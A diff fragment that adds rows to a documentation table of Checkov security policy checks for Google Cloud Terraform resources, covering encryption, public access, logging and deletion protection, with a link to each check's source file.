+| 1720 | CKV_GCP_84      | resource | google_artifact_registry_repository                     | Ensure Artifact Registry Repositories are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                        | Terraform | [ArtifactRegsitryEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegsitryEncryptedWithCMK.py)                                                               |
+| 1721 | CKV_GCP_85      | resource | google_bigtable_instance                                | Ensure Big Table Instances are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                   | Terraform | [BigTableInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceEncryptedWithCMK.py)                                                               |
+| 1722 | CKV_GCP_86      | resource | google_cloudbuild_worker_pool                           | Ensure Cloud build workers are private                                                                                                                                                                   | Terraform | [CloudBuildWorkersArePrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudBuildWorkersArePrivate.py)                                                                         |
+| 1723 | CKV_GCP_87      | resource | google_data_fusion_instance                             | Ensure Data fusion instances are private                                                                                                                                                                 | Terraform | [DataFusionPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionPrivateInstance.py)                                                                             |
+| 1724 | CKV_GCP_88      | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted mysql access                                                                                                                          | Terraform | [GoogleComputeFirewallUnrestrictedIngress3306.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress3306.py)                                       |
+| 1725 | CKV_GCP_89      | resource | google_notebooks_instance                               | Ensure Vertex AI instances are private                                                                                                                                                                   | Terraform | [VertexAIPrivateInstance.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIPrivateInstance.py)                                                                                 |
+| 1726 | CKV_GCP_90      | resource | google_dataflow_job                                     | Ensure data flow jobs are encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                        | Terraform | [DataflowJobEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowJobEncryptedWithCMK.py)                                                                         |
+| 1727 | CKV_GCP_91      | resource | google_dataproc_cluster                                 | Ensure Dataproc cluster is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform | [DataprocClusterEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocClusterEncryptedWithCMK.py)                                                                 |
+| 1728 | CKV_GCP_92      | resource | google_vertex_ai_dataset                                | Ensure Vertex AI datasets uses a CMK (Customer Managed Key)                                                                                                                                              | Terraform | [VertexAIDatasetEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIDatasetEncryptedWithCMK.py)                                                                 |
+| 1729 | CKV_GCP_93      | resource | google_spanner_database                                 | Ensure Spanner Database is encrypted with Customer Supplied Encryption Keys (CSEK)                                                                                                                       | Terraform | [SpannerDatabaseEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseEncryptedWithCMK.py)                                                                 |
+| 1730 | CKV_GCP_94      | resource | google_dataflow_job                                     | Ensure Dataflow jobs are private                                                                                                                                                                         | Terraform | [DataflowPrivateJob.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataflowPrivateJob.py)                                                                                           |
+| 1731 | CKV_GCP_95      | resource | google_redis_instance                                   | Ensure Memorystore for Redis has AUTH enabled                                                                                                                                                            | Terraform | [MemorystoreForRedisAuthEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisAuthEnabled.py)                                                                   |
+| 1732 | CKV_GCP_96      | resource | google_vertex_ai_metadata_store                         | Ensure Vertex AI Metadata Store uses a CMK (Customer Managed Key)                                                                                                                                        | Terraform | [VertexAIMetadataStoreEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/VertexAIMetadataStoreEncryptedWithCMK.py)                                                     |
+| 1733 | CKV_GCP_97      | resource | google_redis_instance                                   | Ensure Memorystore for Redis uses intransit encryption                                                                                                                                                   | Terraform | [MemorystoreForRedisInTransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/MemorystoreForRedisInTransitEncryption.py)                                                   |
+| 1734 | CKV_GCP_98      | resource | google_dataproc_cluster_iam_binding                     | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                                   |
+| 1735 | CKV_GCP_98      | resource | google_dataproc_cluster_iam_member                      | Ensure that Dataproc clusters are not anonymously or publicly accessible                                                                                                                                 | Terraform | [DataprocPrivateCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPrivateCluster.py)                                                                                   |
+| 1736 | CKV_GCP_99      | resource | google_pubsub_topic_iam_binding                         | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                           |
+| 1737 | CKV_GCP_99      | resource | google_pubsub_topic_iam_member                          | Ensure that Pub/Sub Topics are not anonymously or publicly accessible                                                                                                                                    | Terraform | [PubSubPrivateTopic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/PubSubPrivateTopic.py)                                                                                           |
+| 1738 | CKV_GCP_100     | resource | google_bigquery_table_iam_binding                       | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                                       |
+| 1739 | CKV_GCP_100     | resource | google_bigquery_table_iam_member                        | Ensure that BigQuery Tables are not anonymously or publicly accessible                                                                                                                                   | Terraform | [BigQueryPrivateTable.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryPrivateTable.py)                                                                                       |
+| 1740 | CKV_GCP_101     | resource | google_artifact_registry_repository_iam_binding         | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                         |
+| 1741 | CKV_GCP_101     | resource | google_artifact_registry_repository_iam_member          | Ensure that Artifact Registry repositories are not anonymously or publicly accessible                                                                                                                    | Terraform | [ArtifactRegistryPrivateRepo.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/ArtifactRegistryPrivateRepo.py)                                                                         |
+| 1742 | CKV_GCP_102     | resource | google_cloud_run_service_iam_binding                    | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                             |
+| 1743 | CKV_GCP_102     | resource | google_cloud_run_service_iam_member                     | Ensure that GCP Cloud Run services are not anonymously or publicly accessible                                                                                                                            | Terraform | [GCPCloudRunPrivateService.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GCPCloudRunPrivateService.py)                                                                             |
+| 1744 | CKV_GCP_103     | resource | google_dataproc_cluster                                 | Ensure Dataproc Clusters do not have public IPs                                                                                                                                                          | Terraform | [DataprocPublicIpCluster.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataprocPublicIpCluster.py)                                                                                 |
+| 1745 | CKV_GCP_104     | resource | google_data_fusion_instance                             | Ensure Datafusion has stack driver logging enabled                                                                                                                                                       | Terraform | [DataFusionStackdriverLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverLogs.py)                                                                             |
+| 1746 | CKV_GCP_105     | resource | google_data_fusion_instance                             | Ensure Datafusion has stack driver monitoring enabled                                                                                                                                                    | Terraform | [DataFusionStackdriverMonitoring.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/DataFusionStackdriverMonitoring.py)                                                                 |
+| 1747 | CKV_GCP_106     | resource | google_compute_firewall                                 | Ensure Google compute firewall ingress does not allow unrestricted http port 80 access                                                                                                                   | Terraform | [GoogleComputeFirewallUnrestrictedIngress80.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleComputeFirewallUnrestrictedIngress80.py)                                           |
+| 1748 | CKV_GCP_107     | resource | google_cloudfunctions2_function_iam_binding             | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 1749 | CKV_GCP_107     | resource | google_cloudfunctions2_function_iam_member              | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 1750 | CKV_GCP_107     | resource | google_cloudfunctions_function_iam_binding              | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 1751 | CKV_GCP_107     | resource | google_cloudfunctions_function_iam_member               | Cloud functions should not be public                                                                                                                                                                     | Terraform | [CloudFunctionsShouldNotBePublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionsShouldNotBePublic.py)                                                                 |
+| 1752 | CKV_GCP_108     | resource | google_sql_database_instance                            | Ensure hostnames are logged for GCP PostgreSQL databases                                                                                                                                                 | Terraform | [GoogleCloudPostgreSqlLogHostname.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogHostname.py)                                                               |
+| 1753 | CKV_GCP_109     | resource | google_sql_database_instance                            | Ensure the GCP PostgreSQL database log levels are set to ERROR or lower                                                                                                                                  | Terraform | [GoogleCloudPostgreSqlLogMinErrorStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogMinErrorStatement.py)                                             |
+| 1754 | CKV_GCP_110     | resource | google_sql_database_instance                            | Ensure pgAudit is enabled for your GCP PostgreSQL database                                                                                                                                               | Terraform | [GoogleCloudPostgreSqlEnablePgaudit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlEnablePgaudit.py)                                                           |
+| 1755 | CKV_GCP_111     | resource | google_sql_database_instance                            | Ensure GCP PostgreSQL logs SQL statements                                                                                                                                                                | Terraform | [GoogleCloudPostgreSqlLogStatement.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleCloudPostgreSqlLogStatement.py)                                                             |
+| 1756 | CKV_GCP_112     | resource | google_kms_crypto_key_iam_binding                       | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                                       |
+| 1757 | CKV_GCP_112     | resource | google_kms_crypto_key_iam_member                        | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                                       |
+| 1758 | CKV_GCP_112     | resource | google_kms_crypto_key_iam_policy                        | Esnure KMS policy should not allow public access                                                                                                                                                         | Terraform | [GoogleKMSKeyIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleKMSKeyIsPublic.py)                                                                                       |
+| 1759 | CKV_GCP_113     | data     | google_iam_policy                                       | Ensure IAM policy should not define public access                                                                                                                                                        | Terraform | [GooglePolicyIsPrivate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/data/gcp/GooglePolicyIsPrivate.py)                                                                                         |
+| 1760 | CKV_GCP_114     | resource | google_storage_bucket                                   | Ensure public access prevention is enforced on Cloud Storage bucket                                                                                                                                      | Terraform | [GoogleStoragePublicAccessPrevention.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleStoragePublicAccessPrevention.py)                                                         |
+| 1761 | CKV_GCP_115     | resource | google_organization_iam_binding                         | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                           |
+| 1762 | CKV_GCP_115     | resource | google_organization_iam_member                          | Ensure basic roles are not used at organization level.                                                                                                                                                   | Terraform | [GoogleOrgBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleOrgBasicRole.py)                                                                                           |
+| 1763 | CKV_GCP_116     | resource | google_folder_iam_binding                               | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                                     |
+| 1764 | CKV_GCP_116     | resource | google_folder_iam_member                                | Ensure basic roles are not used at folder level.                                                                                                                                                         | Terraform | [GoogleFolderBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleFolderBasicRole.py)                                                                                     |
+| 1765 | CKV_GCP_117     | resource | google_project_iam_binding                              | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                                   |
+| 1766 | CKV_GCP_117     | resource | google_project_iam_member                               | Ensure basic roles are not used at project level.                                                                                                                                                        | Terraform | [GoogleProjectBasicRole.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleProjectBasicRole.py)                                                                                   |
+| 1767 | CKV_GCP_118     | resource | google_iam_workload_identity_pool_provider              | Ensure IAM workload identity pool provider is restricted                                                                                                                                                 | Terraform | [GoogleIAMWorkloadIdentityConditional.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GoogleIAMWorkloadIdentityConditional.py)                                                       |
+| 1768 | CKV_GCP_119     | resource | google_spanner_database                                 | Ensure Spanner Database has deletion protection enabled                                                                                                                                                  | Terraform | [SpannerDatabaseDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDeletionProtection.py)                                                             |
+| 1769 | CKV_GCP_120     | resource | google_spanner_database                                 | Ensure Spanner Database has drop protection enabled                                                                                                                                                      | Terraform | [SpannerDatabaseDropProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/SpannerDatabaseDropProtection.py)                                                                     |
+| 1770 | CKV_GCP_121     | resource | google_bigquery_table                                   | Ensure BigQuery tables have deletion protection enabled                                                                                                                                                  | Terraform | [BigQueryTableDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigQueryTableDeletionProtection.py)                                                                 |
+| 1771 | CKV_GCP_122     | resource | google_bigtable_instance                                | Ensure Big Table Instances have deletion protection enabled                                                                                                                                              | Terraform | [BigTableInstanceDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/BigTableInstanceDeletionProtection.py)                                                           |
+| 1772 | CKV_GCP_123     | resource | google_container_cluster                                | GKE Don't Use NodePools in the Cluster configuration                                                                                                                                                     | Terraform | [GKEDontUseNodePools.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/GKEDontUseNodePools.py)                                                                                         |
+| 1773 | CKV_GCP_124     | resource | google_cloudfunctions2_function                         | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting                                                                                                                       | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py)                                                                   |
+| 1774 | CKV_GCP_124     | resource | google_cloudfunctions_function                          | Ensure GCP Cloud Function is not configured with overly permissive Ingress setting                                                                                                                       | Terraform | [CloudFunctionPermissiveIngress.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/gcp/CloudFunctionPermissiveIngress.py)                                                                   |
+| 1775 | CKV2_GCP_1      | resource | google_project_default_service_accounts                 | Ensure GKE clusters are not running using the Compute Engine default service account                                                                                                                     | Terraform | [GKEClustersAreNotUsingDefaultServiceAccount.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GKEClustersAreNotUsingDefaultServiceAccount.yaml)                                 |
+| 1776 | CKV2_GCP_2      | resource | google_compute_network                                  | Ensure legacy networks do not exist for a project                                                                                                                                                        | Terraform | [GCPProjectHasNoLegacyNetworks.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPProjectHasNoLegacyNetworks.yaml)                                                             |
+| 1777 | CKV2_GCP_3      | resource | google_service_account_key                              | Ensure that there are only GCP-managed service account keys for each service account                                                                                                                     | Terraform | [ServiceAccountHasGCPmanagedKey.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/ServiceAccountHasGCPmanagedKey.yaml)                                                           |
+| 1778 | CKV2_GCP_4      | resource | google_logging_folder_sink                              | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 1779 | CKV2_GCP_4      | resource | google_logging_organization_sink                        | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 1780 | CKV2_GCP_4      | resource | google_logging_project_sink                             | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 1781 | CKV2_GCP_4      | resource | google_storage_bucket                                   | Ensure that retention policies on log buckets are configured using Bucket Lock                                                                                                                           | Terraform | [GCPLogBucketsConfiguredUsingLock.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPLogBucketsConfiguredUsingLock.yaml)                                                       |
+| 1782 | CKV2_GCP_5      | resource | google_project                                          | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                               |
+| 1783 | CKV2_GCP_5      | resource | google_project_iam_audit_config                         | Ensure that Cloud Audit Logging is configured properly across all services and all users from a project                                                                                                  | Terraform | [GCPAuditLogsConfiguredForAllServicesAndUsers.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPAuditLogsConfiguredForAllServicesAndUsers.yaml)                               |
+| 1784 | CKV2_GCP_6      | resource | google_kms_crypto_key                                   | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                                       |
+| 1785 | CKV2_GCP_6      | resource | google_kms_crypto_key_iam_binding                       | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                                       |
+| 1786 | CKV2_GCP_6      | resource | google_kms_crypto_key_iam_member                        | Ensure that Cloud KMS cryptokeys are not anonymously or publicly accessible                                                                                                                              | Terraform | [GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSCryptoKeysAreNotPubliclyAccessible.yaml)                                       |
+| 1787 | CKV2_GCP_7      | resource | google_sql_database_instance                            | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml)         |
+| 1788 | CKV2_GCP_7      | resource | google_sql_user                                         | Ensure that a MySQL database instance does not allow anyone to connect with administrative privileges                                                                                                    | Terraform | [DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/DisableAccessToSqlDBInstanceForRootUsersWithoutPassword.yaml)         |
+| 1789 | CKV2_GCP_8      | resource | google_kms_key_ring                                     | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                           |
+| 1790 | CKV2_GCP_8      | resource | google_kms_key_ring_iam_binding                         | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                           |
+| 1791 | CKV2_GCP_8      | resource | google_kms_key_ring_iam_member                          | Ensure that Cloud KMS Key Rings are not anonymously or publicly accessible                                                                                                                               | Terraform | [GCPKMSKeyRingsAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPKMSKeyRingsAreNotPubliclyAccessible.yaml)                                           |
+| 1792 | CKV2_GCP_9      | resource | google_container_registry                               | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)                     |
+| 1793 | CKV2_GCP_9      | resource | google_storage_bucket_iam_binding                       | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)                     |
+| 1794 | CKV2_GCP_9      | resource | google_storage_bucket_iam_member                        | Ensure that Container Registry repositories are not anonymously or publicly accessible                                                                                                                   | Terraform | [GCPContainerRegistryReposAreNotPubliclyAccessible.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPContainerRegistryReposAreNotPubliclyAccessible.yaml)                     |
+| 1795 | CKV2_GCP_10     | resource | google_cloudfunctions_function                          | Ensure GCP Cloud Function HTTP trigger is secured                                                                                                                                                        | Terraform | [CloudFunctionSecureHTTPTrigger.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/CloudFunctionSecureHTTPTrigger.yaml)                                                           |
+| 1796 | CKV2_GCP_11     | resource | google_project_services                                 | Ensure GCP GCR Container Vulnerability Scanning is enabled                                                                                                                                               | Terraform | [GCRContainerVulnerabilityScanningEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCRContainerVulnerabilityScanningEnabled.yaml)                                       |
+| 1797 | CKV2_GCP_12     | resource | google_compute_firewall                                 | Ensure GCP compute firewall ingress does not allow unrestricted access to all ports                                                                                                                      | Terraform | [GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPComputeFirewallOverlyPermissiveToAllTraffic.yaml)                           |
+| 1798 | CKV2_GCP_13     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_duration' is set to 'on'                                                                                                                                            | Terraform | [GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_durationIsSetToON.yaml)                           |
+| 1799 | CKV2_GCP_14     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_executor_stats' is set to 'off'                                                                                                                                     | Terraform | [GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_executor_statsIsSetToOFF.yaml)             |
+| 1800 | CKV2_GCP_15     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_parser_stats' is set to 'off'                                                                                                                                       | Terraform | [GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_parser_statsIsSetToOFF.yaml)                 |
+| 1801 | CKV2_GCP_16     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_planner_stats' is set to 'off'                                                                                                                                      | Terraform | [GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_planner_statsIsSetToOFF.yaml)               |
+| 1802 | CKV2_GCP_17     | resource | google_sql_database_instance                            | Ensure PostgreSQL database flag 'log_statement_stats' is set to 'off'                                                                                                                                    | Terraform | [GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPPostgreSQLDatabaseFlaglog_statement_statsIsSetToOFF.yaml)           |
+| 1803 | CKV2_GCP_18     | resource | google_compute_network                                  | Ensure GCP network defines a firewall and does not use the default firewall                                                                                                                              | Terraform | [GCPNetworkDoesNotUseDefaultFirewall.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPNetworkDoesNotUseDefaultFirewall.yaml)                                                 |
+| 1804 | CKV2_GCP_19     | resource | google_container_cluster                                | Ensure GCP Kubernetes engine clusters have 'alpha cluster' feature disabled                                                                                                                              | Terraform | [GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPdisableAlphaClusterFeatureInKubernetesEngineClusters.yaml)         |
+| 1805 | CKV2_GCP_20     | resource | google_sql_database_instance                            | Ensure MySQL DB instance has point-in-time recovery backup configured                                                                                                                                    | Terraform | [GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPMySQLdbInstancePoint_In_TimeRecoveryBackupIsEnabled.yaml)           |
+| 1806 | CKV2_GCP_21     | resource | google_notebooks_instance                               | Ensure Vertex AI instance disks are encrypted with a Customer Managed Key (CMK)                                                                                                                          | Terraform | [GCPVertexInstanceEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPVertexInstanceEncryptedWithCMK.yaml)                                                     |
+| 1807 | CKV2_GCP_22     | resource | google_document_ai_processor                            | Ensure Document AI Processors are encrypted with a Customer Managed Key (CMK)                                                                                                                            | Terraform | [GCPDocumentAIProcessorEncryptedWithCMK.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/graph_checks/gcp/GCPDocumentAIProcessorEncryptedWithCMK.yaml)                                           |
